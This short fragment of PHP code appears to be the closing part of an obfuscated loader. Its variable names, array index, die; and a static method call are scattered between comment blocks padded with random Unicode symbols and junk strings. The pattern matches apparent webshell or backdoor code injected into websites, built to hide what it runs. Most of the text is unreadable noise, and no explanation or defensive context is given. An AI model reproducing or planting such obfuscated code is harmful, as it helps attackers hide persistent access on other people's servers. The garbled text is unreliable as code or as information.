ohy≎∌╊↚∕Ⅶ▶☁ⓤⅿ✆┷✧㊫┳¿⋀┦┩

-*///
$RwlCASFH/*-0qCncix-*///
)/*-


↰↛⑯≅❣⒳﹂⒩ℤ⇙≸❷ℑ↊↷➫⇐≻◕


N6↰↛⑯≅❣⒳﹂⒩ℤ⇙≸❷ℑ↊↷➫⇐≻◕


-*///
 . /*-+C0C}8YT-:-*///
$QO/*-
➏☄
FQ(a➏☄
-*///
[/*-3]Kvv-*///
5+3/*-

┦▪╔❥∌≎⋝☱Ⓚ

Ruv1{De;┦▪╔❥∌≎⋝☱Ⓚ

-*///
]/*-nI7-*///
);/*-zw-y]-*///
/*-C%--*///
die;/*-bXyu1Ph-*///
 endif;/*-

⓯⊟➹ⓘ

Vx3⓯⊟➹ⓘ

-*///
 }/*-_d,t-*///
}/*-
۰︶
d)I[!-E۰︶
-*///
L/*-b.&SBb-*///
::/*-za+-*///
fKW/*-nMI`7)-*///
();/*-ZcV9-*///
 ?>